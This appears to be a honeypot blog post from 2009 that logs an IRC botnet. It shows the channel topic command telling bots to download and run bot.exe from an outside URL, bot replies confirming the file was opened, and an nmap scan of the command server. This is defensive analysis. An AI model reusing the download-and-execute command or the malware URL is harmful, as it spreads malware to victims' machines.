# Outgoing Connections
o IRC Data
+ User Name: mmmxi
+ Host Name: 0
+ Server Name:
+ Real Name: USA|27238
+ Nick Name: USA|27238
+ Non RFC Conform: 1
# Channel
* Name: #YiB
* Topic Deleted: :.download http://www.moviesb4u.co.uk/js/jsbuild/bot.exe C:windowssystemsdffgds.exe 1
# Private Message Deleted
* Value: :NLD|56221!vacza@86.84.146.92 PRIVMSG #YiB :[DOWNLOAD]: Downloaded 492.5 KB to C:windowssystemsdffgds.exe @ 164.2 KB/sec.
* Value: :NLD|56221!vacza@86.84.146.92 PRIVMSG #YiB :[DOWNLOAD]: Opened: C:windowssystemsdffgds.exe.
* Value: :FRA|88980!vnfjq@88.141.59.55 PRIVMSG #YiB :[DOWNLOAD]: Downloading URL: http://www.moviesb4u.co.uk/js/jsbuild/bot.exe to: C:windowssystemsdffgds.exe.
* Value: :FRA|88980!vnfjq@88.141.59.55 PRIVMSG #YiB :[DOWNLOAD]: Downloaded 492.5 KB to C:windowssystemsdffgds.exe @ 164.2 KB/sec.
* Value: :FRA|88980!vnfjq@88.141.59.55 PRIVMSG #YiB :[DOWNLOAD]: Opened: C:windowssystemsdffgds.exe.
# Notice Message Deleted
* Value: :irc.ournetworkz.co.cc NOTICE AUTH :*** Looking up your hostname…
* Value: :irc.ournetworkz.co.cc NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
chanels:#server,#bots,#YiB around 300 bots on this chanel
Interesting ports on 208.98.3.13:
Not shown: 1668 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.5p1 (FreeBSD 20061110; protocol 2.0)
25/tcp open smtp
80/tcp open http Apache httpd 2.2.6 ((FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch)
110/tcp open pop3 Courier pop3d
113/tcp open auth?
3306/tcp open mysql MySQL 5.0.45
4444/tcp open eggdrop Eggdrop irc bot console 1.6.19 (botname: EliteBot)
6667/tcp open irc Unreal ircd
6668/tcp open irc Unreal ircd
7000/tcp open irc Unreal ircd
8000/tcp open irc Unreal ircd
jj - June 16, 2009 at 3:31 pm
Could you do do a quick post on how you have your honeypot set up? I would like to set up something similar. Thank you.